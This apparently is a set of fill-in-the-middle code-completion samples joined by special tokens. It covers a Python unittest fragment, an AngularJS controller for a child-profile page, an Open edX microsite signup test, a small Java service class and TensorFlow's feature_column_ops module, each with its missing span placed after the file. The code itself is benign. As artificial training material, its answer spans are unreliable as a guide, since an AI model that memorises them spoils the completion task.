rotANDshift_ns_vac_Cs_set1,
)
)
self.assertTrue(
sc_agnostic_pdc.are_equal(
ns_vac_Cs_set1,
# same defect on different sublattice point (shifted and rotated)
rotANDshift_ns_vac_Cs_set2,
)
)
if __name__ == "__main__":
unittest.main()<|fim▁end|> | )
)
self.assertFalse( |
<|file_name|>my-children-controller.js<|end_file_name|><|fim▁begin|>/* global _, angular */
'use strict';
function myChildrenCtrl ($scope, $state, $translate, ownProfile, cdUsersService) {
$scope.parentProfileData = ownProfile.data;
$scope.tabs = [];
function loadChildrenTabs () {
$scope.tabs = [];
cdUsersService.loadChildrenForUser($scope.parentProfileData.userId, function (children) {
$scope.children = _.sortBy(children, [
function (child) {
return child.name.toLowerCase();
}
]);
$scope.tabs = $scope.children.map(function (child) {
return {
state: 'my-children.child',
stateParams: {id: child.userId},
tabImage: '/api/2.0/profiles/' + child.id + '/avatar_img',
tabTitle: child.name,
tabSubTitle: child.alias
};
});
$scope.tabs.push({
state: 'my-children.add',
tabImage: '/img/avatars/avatar.png',
tabTitle: $translate.instant('Add Child')
});
});
}
loadChildrenTabs();
$scope.$on('$stateChangeStart', function (e, toState, params) {
if (toState.name === 'my-children.child') {
var childLoaded = _.some($scope.children, function (child) {
return child.userId === params.id;<|fim▁hole|> loadChildrenTabs();
}
}
});
}
angular.module('cpZenPlatform')
.controller('my-children-controller', ['$scope', '$state', '$translate', 'ownProfile', 'cdUsersService', myChildrenCtrl]);<|fim▁end|> | });
if (!childLoaded) { |
<|file_name|>test_microsite.py<|end_file_name|><|fim▁begin|>"""
Test for User Creation from Micro-Sites
"""
from django.test import TestCase
from student.models import UserSignupSource
import mock
import json
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
FAKE_MICROSITE = {
"SITE_NAME": "openedx.localhost",
"university": "fakeuniversity",
"course_org_filter": "fakeorg",
"REGISTRATION_EXTRA_FIELDS": {
"address1": "required",
"city": "required",
"state": "required",
"country": "required",
"company": "required",
"title": "required"
},
"extended_profile_fields": [
"address1", "state", "company", "title"
]
}
def fake_site_name(name, default=None):
"""
create a fake microsite site name
"""
if name == 'SITE_NAME':
return 'openedx.localhost'
else:
return default
<|fim▁hole|> """
create a fake microsite site name
"""
return FAKE_MICROSITE.get(name, default)
class TestMicrosite(TestCase):
"""Test for Account Creation from a white labeled Micro-Sites"""
def setUp(self):
super(TestMicrosite, self).setUp()
self.username = "test_user"
self.url = reverse("create_account")
self.params = {
"username": self.username,
"email": "[email protected]",
"password": "testpass",
"name": "Test User",
"honor_code": "true",
"terms_of_service": "true",
}
self.extended_params = dict(self.params.items() + {
"address1": "foo",
"city": "foo",
"state": "foo",
"country": "foo",
"company": "foo",
"title": "foo"
}.items())
@mock.patch("microsite_configuration.microsite.get_value", fake_site_name)
def test_user_signup_source(self):
"""
test to create a user form the microsite and see that it record has been
saved in the UserSignupSource Table
"""
response = self.client.post(self.url, self.params)
self.assertEqual(response.status_code, 200)
self.assertGreater(len(UserSignupSource.objects.filter(site='openedx.localhost')), 0)
def test_user_signup_from_non_micro_site(self):
"""
test to create a user form the non-microsite. The record should not be saved
in the UserSignupSource Table
"""
response = self.client.post(self.url, self.params)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(UserSignupSource.objects.filter(site='openedx.localhost')), 0)
@mock.patch("microsite_configuration.microsite.get_value", fake_microsite_get_value)
def test_user_signup_missing_enhanced_profile(self):
"""
test to create a user form the microsite but don't provide any of the microsite specific
profile information
"""
response = self.client.post(self.url, self.params)
self.assertEqual(response.status_code, 400)
@mock.patch("microsite_configuration.microsite.get_value", fake_microsite_get_value)
def test_user_signup_including_enhanced_profile(self):
"""
test to create a user form the microsite but don't provide any of the microsite specific
profile information
"""
response = self.client.post(self.url, self.extended_params)
self.assertEqual(response.status_code, 200)
user = User.objects.get(username=self.username)
meta = json.loads(user.profile.meta)
self.assertEqual(meta['address1'], 'foo')
self.assertEqual(meta['state'], 'foo')
self.assertEqual(meta['company'], 'foo')
self.assertEqual(meta['title'], 'foo')<|fim▁end|> | def fake_microsite_get_value(name, default=None): |
<|file_name|>ShapeService.java<|end_file_name|><|fim▁begin|>package com.sp.jb.service;
import com.sp.jb.model.Circle;
import com.sp.jb.model.Triangle;
public class ShapeService {
private Circle circle;<|fim▁hole|> private Triangle triangle;
public Circle getCircle() {
return circle;
}
public void setCircle(Circle circle) {
this.circle = circle;
}
public Triangle getTriangle() {
return triangle;
}
public void setTriangle(Triangle triangle) {
this.triangle = triangle;
}
}<|fim▁end|> | |
<|file_name|>feature_column_ops.py<|end_file_name|><|fim▁begin|># Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities related to FeatureColumn."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.framework.python.framework import checkpoint_utils
from tensorflow.contrib.framework.python.framework import experimental
from tensorflow.contrib.framework.python.ops import variables as contrib_variables
from tensorflow.contrib.layers.python.layers import embedding_ops
from tensorflow.contrib.layers.python.layers import feature_column as fc
from tensorflow.contrib.layers.python.layers import layers
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor as sparse_tensor_py
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import parsing_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
def _embeddings_from_arguments(column,
args,
weight_collections,
trainable,
output_rank=2):
"""Returns embeddings for a column based on the computed arguments.
Args:
column: the column name.
args: the _DeepEmbeddingLookupArguments for this column.
weight_collections: collections to store weights in.
trainable: whether these embeddings should be trainable.
output_rank: the desired rank of the returned `Tensor`. Inner dimensions will
be combined to produce the desired rank.
Returns:
the embeddings.
Raises:
ValueError: if not possible to create.
"""
# pylint: disable=protected-access
input_tensor = layers._inner_flatten(args.input_tensor, output_rank)
weight_tensor = None
if args.weight_tensor is not None:
weight_tensor = layers._inner_flatten(args.weight_tensor, output_rank)
# pylint: enable=protected-access
if args.hashed:
embeddings = contrib_variables.model_variable(
name='weights',
shape=[args.vocab_size],
dtype=dtypes.float32,
initializer=args.initializer,
trainable=trainable,
collections=weight_collections)
return embedding_ops.hashed_embedding_lookup_sparse(
embeddings, input_tensor, args.dimension,
combiner=args.combiner, name='lookup')
if args.shared_embedding_name is not None:
shared_embedding_collection_name = (
'SHARED_EMBEDDING_COLLECTION_' + args.shared_embedding_name.upper())
graph = ops.get_default_graph()
shared_embedding_collection = (
graph.get_collection_ref(shared_embedding_collection_name))
shape = [args.vocab_size, args.dimension]
if shared_embedding_collection:
if len(shared_embedding_collection) > 1:
raise ValueError('Collection %s can only contain one '
'(partitioned) variable.'
% shared_embedding_collection_name)
else:
embeddings = shared_embedding_collection[0]
if embeddings.get_shape() != shape:
raise ValueError('The embedding variable with name {} already '
'exists, but its shape does not match required '
'embedding shape here. Please make sure to use '
'different shared_embedding_name for different '
'shared embeddings.'.format(
args.shared_embedding_name))
else:
embeddings = contrib_variables.model_variable(
name=args.shared_embedding_name,
shape=shape,
dtype=dtypes.float32,
initializer=args.initializer,
trainable=trainable,
collections=weight_collections)
graph.add_to_collection(shared_embedding_collection_name, embeddings)
else:
embeddings = contrib_variables.model_variable(
name='weights',
shape=[args.vocab_size, args.dimension],
dtype=dtypes.float32,
initializer=args.initializer,
trainable=trainable,
collections=weight_collections)
if isinstance(embeddings, variables.Variable):
embeddings = [embeddings]
else:
embeddings = embeddings._get_variable_list() # pylint: disable=protected-access
# pylint: disable=protected-access
_maybe_restore_from_checkpoint(
column._checkpoint_path(), embeddings)
return embedding_ops.safe_embedding_lookup_sparse(
embeddings,
input_tensor,
sparse_weights=weight_tensor,
combiner=args.combiner,
name=column.name + 'weights')
def _input_from_feature_columns(columns_to_tensors,
feature_columns,
weight_collections,
trainable,
scope,
output_rank,
default_name):
"""Implementation of `input_from(_sequence)_feature_columns`."""
check_feature_columns(feature_columns)
with variable_scope.variable_scope(scope,
default_name=default_name,
values=columns_to_tensors.values()):
output_tensors = []
transformer = _Transformer(columns_to_tensors)
if weight_collections:
weight_collections = list(set(list(weight_collections) +
[ops.GraphKeys.GLOBAL_VARIABLES]))
for column in sorted(set(feature_columns), key=lambda x: x.key):
with variable_scope.variable_scope(None,
default_name=column.name,
values=columns_to_tensors.values()):
transformed_tensor = transformer.transform(column)
try:
# pylint: disable=protected-access
arguments = column._deep_embedding_lookup_arguments(
transformed_tensor)
output_tensors.append(_embeddings_from_arguments(
column,
arguments,
weight_collections,
trainable,
output_rank=output_rank))
except NotImplementedError as ee:
try:
# pylint: disable=protected-access
output_tensors.append(column._to_dnn_input_layer(
transformed_tensor,
weight_collections,
trainable,
output_rank=output_rank))
except ValueError as e:
raise ValueError('Error creating input layer for column: {}.\n'
'{}, {}'.format(column.name, e, ee))
return array_ops.concat(output_rank - 1, output_tensors)
def input_from_feature_columns(columns_to_tensors,
feature_columns,
weight_collections=None,
trainable=True,
scope=None):
"""A tf.contrib.layer style input layer builder based on FeatureColumns.
Generally a single example in training data is described with feature columns.
At the first layer of the model, this column oriented data should be converted
to a single tensor. Each feature column needs a different kind of operation
during this conversion. For example sparse features need a totally different
handling than continuous features.
An example usage of input_from_feature_columns is as follows:
# Building model for training
columns_to_tensor = tf.parse_example(...)
first_layer = input_from_feature_columns(
columns_to_tensors=columns_to_tensor,
feature_columns=feature_columns)
second_layer = fully_connected(first_layer, ...)
...
where feature_columns can be defined as follows:
occupation = sparse_column_with_hash_bucket(column_name="occupation",
hash_bucket_size=1000)
occupation_emb = embedding_column(sparse_id_column=occupation, dimension=16,
combiner="sum")
age = real_valued_column("age")
age_buckets = bucketized_column(
source_column=age,
boundaries=[18, 25, 30, 35, 40, 45, 50, 55, 60, 65])
feature_columns=[occupation_emb, age_buckets]
Args:
columns_to_tensors: A mapping from feature column to tensors. 'string' key
means a base feature (not-transformed). It can have FeatureColumn as a
key too. That means that FeatureColumn is already transformed by input
pipeline. For example, `inflow` may have handled transformations.
feature_columns: A set containing all the feature columns. All items in the
set should be instances of classes derived by FeatureColumn.
weight_collections: List of graph collections to which weights are added.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
scope: Optional scope for variable_scope.
Returns:
A Tensor which can be consumed by hidden layers in the neural network.
Raises:
ValueError: if FeatureColumn cannot be consumed by a neural network.
"""
return _input_from_feature_columns(columns_to_tensors,
feature_columns,
weight_collections,
trainable,
scope,
output_rank=2,
default_name='input_from_feature_columns')
@experimental
def sequence_input_from_feature_columns(columns_to_tensors,
feature_columns,
weight_collections=None,
trainable=True,
scope=None):
"""Builds inputs for sequence models from `FeatureColumn`s.
See documentation for `input_from_feature_columns`. The following types of
`FeatureColumn` are permitted in `feature_columns`: `_OneHotColumn`,
`_EmbeddingColumn`, `_HashedEmbeddingColumn`, `_RealValuedColumn`,
`_DataFrameColumn`. In addition, columns in `feature_columns` may not be
constructed using any of the following: `HashedEmbeddingColumn`,
`BucketizedColumn`, `CrossedColumn`.
Args:
columns_to_tensors: A mapping from feature column to tensors. 'string' key
means a base feature (not-transformed). It can have FeatureColumn as a
key too. That means that FeatureColumn is already transformed by input
pipeline. For example, `inflow` may have handled transformations.
feature_columns: A set containing all the feature columns. All items in the
set should be instances of classes derived by FeatureColumn.
weight_collections: List of graph collections to which weights are added.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
scope: Optional scope for variable_scope.
Returns:
A Tensor which can be consumed by hidden layers in the neural network.
Raises:
ValueError: if FeatureColumn cannot be consumed by a neural network.
"""
_check_supported_sequence_columns(feature_columns)
_check_forbidden_sequence_columns(feature_columns)
return _input_from_feature_columns(
columns_to_tensors,
feature_columns,
weight_collections,
trainable,
scope,
output_rank=3,
default_name='sequence_input_from_feature_columns')
def _create_embedding_lookup(column,
columns_to_tensors,
embedding_lookup_arguments,
num_outputs,
trainable,
weight_collections):
"""Creates variables and returns predictions for linear weights in a model.
Args:
column: the column we're working on.
columns_to_tensors: a map from column name to tensors.
embedding_lookup_arguments: arguments for embedding lookup.
num_outputs: how many outputs.
trainable: whether the variable we create is trainable.
weight_collections: weights will be placed here.
Returns:
variables: the created embeddings.
predictions: the computed predictions.
"""
with variable_scope.variable_scope(
None, default_name=column.name, values=columns_to_tensors.values()):
variable = contrib_variables.model_variable(
name='weights',
shape=[embedding_lookup_arguments.vocab_size, num_outputs],
dtype=dtypes.float32,
initializer=embedding_lookup_arguments.initializer,
trainable=trainable,
collections=weight_collections)
if isinstance(variable, variables.Variable):
variable = [variable]
else:
variable = variable._get_variable_list() # pylint: disable=protected-access
predictions = embedding_ops.safe_embedding_lookup_sparse(
variable,
embedding_lookup_arguments.input_tensor,
sparse_weights=embedding_lookup_arguments.weight_tensor,
combiner=embedding_lookup_arguments.combiner,
name=column.name + '_weights')
return variable, predictions
def _maybe_restore_from_checkpoint(checkpoint_path, variable):
if checkpoint_path is not None:
path, tensor_name = checkpoint_path
weights_to_restore = variable
if len(variable) == 1:
weights_to_restore = variable[0]
checkpoint_utils.init_from_checkpoint(path,
{tensor_name: weights_to_restore})
def _create_joint_embedding_lookup(columns_to_tensors,
embedding_lookup_arguments,
num_outputs,
trainable,
weight_collections):
"""Creates an embedding lookup for all columns sharing a single weight."""
for arg in embedding_lookup_arguments:
assert arg.weight_tensor is None, (
'Joint sums for weighted sparse columns are not supported. '
'Please use weighted_sum_from_feature_columns instead.')
assert arg.combiner == 'sum', (
'Combiners other than sum are not supported for joint sums. '
'Please use weighted_sum_from_feature_columns instead.')
assert len(embedding_lookup_arguments) >= 1, (
'At least one column must be in the model.')
prev_size = 0
sparse_tensors = []
for a in embedding_lookup_arguments:
t = a.input_tensor
values = t.values + prev_size
prev_size += a.vocab_size
sparse_tensors.append(
sparse_tensor_py.SparseTensor(t.indices,
values,
t.shape))
sparse_tensor = sparse_ops.sparse_concat(1, sparse_tensors)
with variable_scope.variable_scope(
None, default_name='linear_weights', values=columns_to_tensors.values()):
variable = contrib_variables.model_variable(
name='weights',
shape=[prev_size, num_outputs],
dtype=dtypes.float32,
initializer=init_ops.zeros_initializer,
trainable=trainable,
collections=weight_collections)
if isinstance(variable, variables.Variable):
variable = [variable]
else:
variable = variable._get_variable_list() # pylint: disable=protected-access
predictions = embedding_ops.safe_embedding_lookup_sparse(
variable,
sparse_tensor,
sparse_weights=None,
combiner='sum',
name='_weights')
return variable, predictions
def joint_weighted_sum_from_feature_columns(columns_to_tensors,
feature_columns,
num_outputs,
weight_collections=None,
trainable=True,
scope=None):
"""A restricted linear prediction builder based on FeatureColumns.
As long as all feature columns are unweighted sparse columns this computes the
prediction of a linear model which stores all weights in a single variable.
Args:
columns_to_tensors: A mapping from feature column to tensors. 'string' key
means a base feature (not-transformed). It can have FeatureColumn as a
key too. That means that FeatureColumn is already transformed by input
pipeline. For example, `inflow` may have handled transformations.
feature_columns: A set containing all the feature columns. All items in the
set should be instances of classes derived from FeatureColumn.
num_outputs: An integer specifying number of outputs. Default value is 1.
weight_collections: List of graph collections to which weights are added.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
scope: Optional scope for variable_scope.
Returns:
A tuple containing:
* A Tensor which represents predictions of a linear model.
* A list of Variables storing the weights.
* A Variable which is used for bias.
Raises:
ValueError: if FeatureColumn cannot be used for linear predictions.
"""
check_feature_columns(feature_columns)
with variable_scope.variable_scope(
scope,
default_name='joint_weighted_sum_from_feature_columns',
values=columns_to_tensors.values()):
transformer = _Transformer(columns_to_tensors)
embedding_lookup_arguments = []
for column in sorted(set(feature_columns), key=lambda x: x.key):
transformed_tensor = transformer.transform(column)
try:
embedding_lookup_arguments.append(
column._wide_embedding_lookup_arguments(transformed_tensor)) # pylint: disable=protected-access
except NotImplementedError:
raise NotImplementedError('Real-valued columns are not supported. '
'Use weighted_sum_from_feature_columns '
'instead, or bucketize these columns.')
variable, predictions_no_bias = _create_joint_embedding_lookup(
columns_to_tensors,
embedding_lookup_arguments,
num_outputs,
trainable,
weight_collections)
bias = contrib_variables.model_variable(
'bias_weight',
shape=[num_outputs],
initializer=init_ops.zeros_initializer,
collections=_add_variable_collection(weight_collections))
_log_variable(bias)
predictions = nn_ops.bias_add(predictions_no_bias, bias)
return predictions, variable, bias
def weighted_sum_from_feature_columns(columns_to_tensors,
feature_columns,
num_outputs,
weight_collections=None,
trainable=True,
scope=None):
"""A tf.contrib.layer style linear prediction builder based on FeatureColumns.
Generally a single example in training data is described with feature columns.
This function generates weighted sum for each num_outputs. Weighted sum refers
to logits in classification problems. It refers to prediction itself for
linear regression problems.
Example:
```
# Building model for training
feature_columns = (
real_valued_column("my_feature1"),
...
)
columns_to_tensor = tf.parse_example(...)
logits = weighted_sum_from_feature_columns(
columns_to_tensors=columns_to_tensor,
feature_columns=feature_columns,
num_outputs=1)
loss = tf.nn.sigmoid_cross_entropy_with_logits(logits, labels)
```
Args:
columns_to_tensors: A mapping from feature column to tensors. 'string' key
means a base feature (not-transformed). It can have FeatureColumn as a
key too. That means that FeatureColumn is already transformed by input
pipeline. For example, `inflow` may have handled transformations.
feature_columns: A set containing all the feature columns. All items in the
set should be instances of classes derived from FeatureColumn.
num_outputs: An integer specifying number of outputs. Default value is 1.
weight_collections: List of graph collections to which weights are added.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
scope: Optional scope for variable_scope.
Returns:
A tuple containing:
* A Tensor which represents predictions of a linear model.
* A dictionary which maps feature_column to corresponding Variable.
* A Variable which is used for bias.
Raises:
ValueError: if FeatureColumn cannot be used for linear predictions.
"""
check_feature_columns(feature_columns)
with variable_scope.variable_scope(
scope,
default_name='weighted_sum_from_feature_columns',
values=columns_to_tensors.values()):
output_tensors = []
column_to_variable = dict()
transformer = _Transformer(columns_to_tensors)
# pylint: disable=protected-access
for column in sorted(set(feature_columns), key=lambda x: x.key):
transformed_tensor = transformer.transform(column)
try:
embedding_lookup_arguments = column._wide_embedding_lookup_arguments(
transformed_tensor)
variable, predictions = _create_embedding_lookup(
column,
columns_to_tensors,
embedding_lookup_arguments,
num_outputs,
trainable,
weight_collections)
except NotImplementedError:
with variable_scope.variable_scope(
None,
default_name=column.name,
values=columns_to_tensors.values()):
tensor = column._to_dense_tensor(transformed_tensor)
tensor = fc._reshape_real_valued_tensor(tensor, 2, column.name)
variable = [contrib_variables.model_variable(
name='weight',
shape=[tensor.get_shape()[1], num_outputs],
initializer=init_ops.zeros_initializer,
collections=weight_collections)]
predictions = math_ops.matmul(tensor, variable[0], name='matmul')
except ValueError as ee:
raise ValueError('Error creating weighted sum for column: {}.\n'
'{}'.format(column.name, ee))
output_tensors.append(predictions)
column_to_variable[column] = variable
_log_variable(variable)
_maybe_restore_from_checkpoint(column._checkpoint_path(), variable)
# pylint: enable=protected-access
predictions_no_bias = math_ops.add_n(output_tensors)
bias = contrib_variables.model_variable(
'bias_weight',
shape=[num_outputs],
initializer=init_ops.zeros_initializer,
collections=_add_variable_collection(weight_collections))
_log_variable(bias)
predictions = nn_ops.bias_add(predictions_no_bias, bias)
return predictions, column_to_variable, bias
def parse_feature_columns_from_examples(serialized,
feature_columns,
name=None,
example_names=None):
"""Parses tf.Examples to extract tensors for given feature_columns.
This is a wrapper of 'tf.parse_example'.
Example:
```python
columns_to_tensor = parse_feature_columns_from_examples(
serialized=my_data,
feature_columns=my_features)
# Where my_features are:
# Define features and transformations
sparse_feature_a = sparse_column_with_keys(
column_name="sparse_feature_a", keys=["AB", "CD", ...])
embedding_feature_a = embedding_column(
sparse_id_column=sparse_feature_a, dimension=3, combiner="sum")
sparse_feature_b = sparse_column_with_hash_bucket(
column_name="sparse_feature_b", hash_bucket_size=1000)
embedding_feature_b = embedding_column(
sparse_id_column=sparse_feature_b, dimension=16, combiner="sum")
crossed_feature_a_x_b = crossed_column(
columns=[sparse_feature_a, sparse_feature_b], hash_bucket_size=10000)
real_feature = real_valued_column("real_feature")
real_feature_buckets = bucketized_column(
source_column=real_feature, boundaries=[...])
my_features = [embedding_feature_b, real_feature_buckets, embedding_feature_a]
```
Args:
serialized: A vector (1-D Tensor) of strings, a batch of binary
serialized `Example` protos.
feature_columns: An iterable containing all the feature columns. All items
should be instances of classes derived from _FeatureColumn.
name: A name for this operation (optional).
example_names: A vector (1-D Tensor) of strings (optional), the names of
the serialized protos in the batch.
Returns:
A `dict` mapping FeatureColumn to `Tensor` and `SparseTensor` values.
"""
check_feature_columns(feature_columns)
columns_to_tensors = parsing_ops.parse_example(
serialized=serialized,
features=fc.create_feature_spec_for_parsing(feature_columns),
name=name,
example_names=example_names)
transformer = _Transformer(columns_to_tensors)
for column in sorted(set(feature_columns), key=lambda x: x.key):
transformer.transform(column)
return columns_to_tensors
def parse_feature_columns_from_sequence_examples(
serialized,
context_feature_columns,
sequence_feature_columns,
name=None,
example_name=None):
"""Parses tf.SequenceExamples to extract tensors for given `FeatureColumn`s.
Args:
serialized: A scalar (0-D Tensor) of type string, a single serialized
`SequenceExample` proto.
context_feature_columns: An iterable containing the feature columns for
context features. All items should be instances of classes derived from
`_FeatureColumn`. Can be `None`.
sequence_feature_columns: An iterable containing the feature columns for
sequence features. All items should be instances of classes derived from
`_FeatureColumn`. Can be `None`.
name: A name for this operation (optional).
example_name: A scalar (0-D Tensor) of type string (optional), the names of
the serialized proto.
Returns:
A tuple consisting of:
context_features: a dict mapping `FeatureColumns` from
`context_feature_columns` to their parsed `Tensors`/`SparseTensor`s.
sequence_features: a dict mapping `FeatureColumns` from
`sequence_feature_columns` to their parsed `Tensors`/`SparseTensor`s.
"""
# Sequence example parsing requires a single (scalar) example.
try:
serialized = array_ops.reshape(serialized, [])
except ValueError as e:
raise ValueError(
'serialized must contain as single sequence example. Batching must be '
'done after parsing for sequence examples. Error: {}'.format(e))
if context_feature_columns is None:
context_feature_columns = []
if sequence_feature_columns is None:
sequence_feature_columns = []
check_feature_columns(context_feature_columns)
context_feature_spec = fc.create_feature_spec_for_parsing(
context_feature_columns)
check_feature_columns(sequence_feature_columns)
sequence_feature_spec = fc._create_sequence_feature_spec_for_parsing( # pylint: disable=protected-access
sequence_feature_columns, allow_missing_by_default=False)
return parsing_ops.parse_single_sequence_example(serialized,
context_feature_spec,
sequence_feature_spec,
example_name,
name)
def _log_variable(variable):
if isinstance(variable, list):
for var in variable:
if isinstance(variable, variables.Variable):
logging.info('Created variable %s, with device=%s', var.name,
var.device)
elif isinstance(variable, variables.Variable):
logging.info('Created variable %s, with device=%s', variable.name,
variable.device)
def _infer_real_valued_column_for_tensor(name, tensor):
"""Creates a real_valued_column for given tensor and name."""
if isinstance(tensor, sparse_tensor_py.SparseTensor):
raise ValueError(
'SparseTensor is not supported for auto detection. Please define '
'corresponding FeatureColumn for tensor {} {}.', name, tensor)
if not (tensor.dtype.is_integer or tensor.dtype.is_floating):
raise ValueError(
'Non integer or non floating types are not supported for auto detection'
'. Please define corresponding FeatureColumn for tensor {} {}.', name,
tensor)
shape = tensor.get_shape().as_list()
dimension = 1
for i in range(1, len(shape)):
dimension *= shape[i]
return fc.real_valued_column(name, dimension=dimension, dtype=tensor.dtype)
def infer_real_valued_columns(features):
if not isinstance(features, dict):
return [_infer_real_valued_column_for_tensor('', features)]
feature_columns = []
for key, value in features.items():
feature_columns.append(_infer_real_valued_column_for_tensor(key, value))
return feature_columns
def check_feature_columns(feature_columns):
"""Checks the validity of the set of FeatureColumns.
Args:
feature_columns: A set of instances or subclasses of FeatureColumn.
Raises:
ValueError: If there are duplicate feature column keys.
"""
seen_keys = set()
for f in feature_columns:
key = f.key
if key in seen_keys:
raise ValueError('Duplicate feature column key found for column: {}. '
'This usually means that the column is almost identical '
'to another column, and one must be discarded.'.format(
f.name))
seen_keys.add(key)
class _Transformer(object):
"""Handles all the transformations defined by FeatureColumn if needed.
FeatureColumn specifies how to digest an input column to the network. Some
feature columns require data transformations. This class handles those
transformations if they are not handled already.
Some features may be used in more than one places. For example one can use a
bucketized feature by itself and a cross with it. In that case Transformer
should create only one bucketization op instead of multiple ops for each
feature column. To handle re-use of transformed columns, Transformer keeps all
previously transformed columns.
An example usage of Transformer is as follows:
occupation = sparse_column_with_hash_bucket(column_name="occupation",
hash_bucket_size=1000)
age = real_valued_column("age")
age_buckets = bucketized_column(
source_column=age,
boundaries=[18, 25, 30, 35, 40, 45, 50, 55, 60, 65])
occupation_x_age = crossed_column(columns=[occupation, age_buckets],
hash_bucket_size=10000)
columns_to_tensor = tf.parse_example(...)
transformer = Transformer(columns_to_tensor)
occupation_x_age_tensor = transformer.transform(occupation_x_age)
occupation_tensor = transformer.transform(occupation)
age_buckets_tensor = transformer.transform(age_buckets)
"""
def __init__(self, columns_to_tensors):
"""Initializes transfomer.
Args:
columns_to_tensors: A mapping from feature columns to tensors. 'string'
key means a base feature (not-transformed). It can have FeatureColumn as
a key too. That means that FeatureColumn is already transformed by input<|fim▁hole|> pipeline. For example, `inflow` may have handled transformations.
Transformed features are inserted in columns_to_tensors.
"""
self._columns_to_tensors = columns_to_tensors
def transform(self, feature_column):
"""Returns a Tensor which represents given feature_column.
Args:
feature_column: An instance of FeatureColumn.
Returns:
A Tensor which represents given feature_column. It may create a new Tensor
or re-use an existing one.
Raises:
ValueError: if FeatureColumn cannot be handled by this Transformer.
"""
logging.debug('Transforming feature_column %s', feature_column)
if feature_column in self._columns_to_tensors:
# Feature_column is already transformed.
return self._columns_to_tensors[feature_column]
feature_column.insert_transformed_feature(self._columns_to_tensors)
if feature_column not in self._columns_to_tensors:
raise ValueError('Column {} is not supported.'.format(
feature_column.name))
return self._columns_to_tensors[feature_column]
def _add_variable_collection(weight_collections):
if weight_collections:
weight_collections = list(
set(list(weight_collections) + [ops.GraphKeys.GLOBAL_VARIABLES]))
return weight_collections
# TODO(jamieas): remove the following logic once all FeatureColumn types are
# supported for sequences.
# pylint: disable=protected-access
_SUPPORTED_SEQUENCE_COLUMNS = (fc._OneHotColumn,
fc._EmbeddingColumn,
fc._RealValuedColumn)
_FORBIDDEN_SEQUENCE_COLUMNS = (fc._HashedEmbeddingColumn,
fc._BucketizedColumn,
fc._CrossedColumn)
def _check_supported_sequence_columns(feature_columns):
"""Asserts `feature_columns` are in `_SUPPORTED_SEQUENCE_COLUMNS`."""
for col in feature_columns:
if not isinstance(col, _SUPPORTED_SEQUENCE_COLUMNS):
raise ValueError(
'FeatureColumn type {} is not currently supported for sequence data.'.
format(type(col).__name__))
def _get_parent_columns(feature_column):
"""Returns the tuple of `FeatureColumn`s that `feature_column` depends on."""
if isinstance(feature_column, (fc._WeightedSparseColumn,
fc._OneHotColumn,
fc._EmbeddingColumn,)):
return (feature_column.sparse_id_column,)
if isinstance(feature_column, (fc._BucketizedColumn,)):
return (feature_column.source_column,)
if isinstance(feature_column, (fc._CrossedColumn)):
return tuple(feature_column.columns)
return tuple()
def _gather_feature_columns(feature_columns):
"""Returns a list of all ancestor `FeatureColumns` of `feature_columns`."""
gathered = list(feature_columns)
i = 0
while i < len(gathered):
for column in _get_parent_columns(gathered[i]):
if column not in gathered:
gathered.append(column)
i += 1
return gathered
def _check_forbidden_sequence_columns(feature_columns):
"""Recursively cecks `feature_columns` for `_FORBIDDEN_SEQUENCE_COLUMNS`."""
all_feature_columns = _gather_feature_columns(feature_columns)
for feature_column in all_feature_columns:
if isinstance(feature_column, _FORBIDDEN_SEQUENCE_COLUMNS):
raise ValueError(
'Column {} is of type {}, which is not currently supported for '
'sequences.'.format(feature_column.name,
type(feature_column).__name__))<|fim▁end|> |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.